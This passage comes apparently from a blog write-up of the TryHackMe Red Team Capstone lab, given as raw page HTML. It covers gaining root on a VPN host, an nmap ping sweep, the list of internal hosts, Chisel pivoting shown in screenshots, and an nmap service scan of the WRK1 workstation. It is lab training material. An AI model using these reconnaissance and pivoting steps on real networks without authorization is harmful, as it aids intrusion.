data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"373\" data-attachment-id=\"482\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151041\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?fit=1149%2C418&amp;ssl=1\" data-orig-size=\"1149,418\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151041\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?fit=1024%2C373&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=1024%2C373&#038;ssl=1\" alt=\"\" class=\"wp-image-482\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=1024%2C373&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=300%2C109&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?resize=768%2C279&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151041.png?w=1149&amp;ssl=1 1149w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The final step is to copy the file back to its original place.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910fd5a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910fd5a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"223\" data-attachment-id=\"483\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151253\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?fit=1235%2C269&amp;ssl=1\" data-orig-size=\"1235,269\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151253\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?fit=1024%2C223&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=1024%2C223&#038;ssl=1\" alt=\"\" class=\"wp-image-483\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=1024%2C223&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=300%2C65&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?resize=768%2C167&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151253.png?w=1235&amp;ssl=1 1235w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We were able to replace the file and switch to our newly created user. We can also see that we have root privileges on the machine now.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"24-ping-sweep-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Ping Sweep<\/mark><\/h5>\n\n\n\n<p>We have NMAP already installed on the VPN machine. Since this machine can talk to the Internal network, we can quickly run a ping sweep and find all the active hosts on the network.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"root@ip-10-200-113-12:~# nmap -sn 10.200.113.0\/24 \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">root@ip-10-200-113-12:~#<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-sn<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.0\/24<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:7px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We found the IP addresses for the hosts.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"10.200.113.11 Webmail\n10.200.113.12 VPN\n10.200.113.13 WEB\n10.200.113.21 WRK1\n10.200.113.22 WRK2\n10.200.113.31\n10.200.113.32\n10.200.113.51\n10.200.113.52\n10.200.113.61\n10.200.113.100\n10.200.113.101\n10.200.113.102 CORPDC\n10.200.113.201\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.11<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Webmail<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.12<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VPN<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.13<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WEB<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.22<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WRK2<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.31<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.32<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.51<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.52<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.61<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.100<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.101<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.102<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CORPDC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">10.200.113.201<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:7px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we recall, we found the .21 and .22 hosts from the OpenVPN connection for <code>mohammad.ahmed<\/code>. We can also see that we have more hosts active on our network map. We will start enumerating them but first, we need to set up pivoting.<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09110918&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09110918\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"553\" data-attachment-id=\"487\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206151756-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?fit=1357%2C733&amp;ssl=1\" data-orig-size=\"1357,733\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206151756-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?fit=1024%2C553&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=1024%2C553&#038;ssl=1\" alt=\"\" class=\"wp-image-487\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=1024%2C553&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=300%2C162&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?resize=768%2C415&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206151756-1.png?w=1357&amp;ssl=1 1357w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"25-pivoting-setup-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Pivoting Setup<\/mark><\/h4>\n\n\n\n<p>We will use <code>Chisel<\/code> to set up Pivoting. Our Kali (attack) machine will serve as a server and the VPN machine will act as a client. We should be able to interact with the machines in the internal network directly from our machine after setting up pivoting.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On our Machine:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"146\" data-attachment-id=\"488\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206160339\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?fit=1557%2C222&amp;ssl=1\" data-orig-size=\"1557,222\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206160339\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?fit=1024%2C146&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1024%2C146&#038;ssl=1\" alt=\"\" class=\"wp-image-488\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1024%2C146&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=300%2C43&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=768%2C110&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?resize=1536%2C219&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160339.png?w=1557&amp;ssl=1 1557w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>On VPN Machine:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"96\" data-attachment-id=\"489\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206160352\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?fit=1320%2C124&amp;ssl=1\" data-orig-size=\"1320,124\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206160352\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?fit=1024%2C96&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=1024%2C96&#038;ssl=1\" alt=\"\" class=\"wp-image-489\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=1024%2C96&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=300%2C28&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?resize=768%2C72&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206160352.png?w=1320&amp;ssl=1 1320w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"26-breaching-the-perimeter-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Breaching the Perimeter<\/mark><\/h2>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"27-wrk1-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">WRK1 Machine<\/mark><\/h3>\n\n\n\n<p>We will begin by running an NMAP scan to find the open ports and services.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"28-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/WRK1]\n\u2514\u2500$ nmap -p22,135,139,445,3389 WRK1.corp.thereserve.loc -A -oN nmap\/wrk1-fullscan -Pn\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-06 12:12 CST\nNmap scan report for WRK1.corp.thereserve.loc (10.200.113.21)\nHost is up (0.52s latency).\n\nPORT     STATE SERVICE       VERSION\n22\/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)\n| ssh-hostkey: \n|   2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)\n|   256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)\n|_  256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n445\/tcp  open  microsoft-ds?\n3389\/tcp open  ms-wbt-server Microsoft Terminal Services\n|_ssl-date: 2024-02-06T18:13:47+00:00; -1s from scanner time.\n| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc\n| Not valid before: 2024-02-04T20:26:11\n|_Not valid after:  2024-08-05T20:26:11\n| rdp-ntlm-info: \n|   Target_Name: CORP\n|   NetBIOS_Domain_Name: CORP\n|   NetBIOS_Computer_Name: WRK1\n|   DNS_Domain_Name: corp.thereserve.loc\n|   DNS_Computer_Name: WRK1.corp.thereserve.loc\n|   DNS_Tree_Name: thereserve.loc\n|   Product_Version: 10.0.17763\n|_  System_Time: 2024-02-06T18:13:09+00:00\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-02-06T18:13:08\n|_  start_date: N\/A\n|_clock-skew: mean: -1s, deviation: 0s, median: -1s\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" 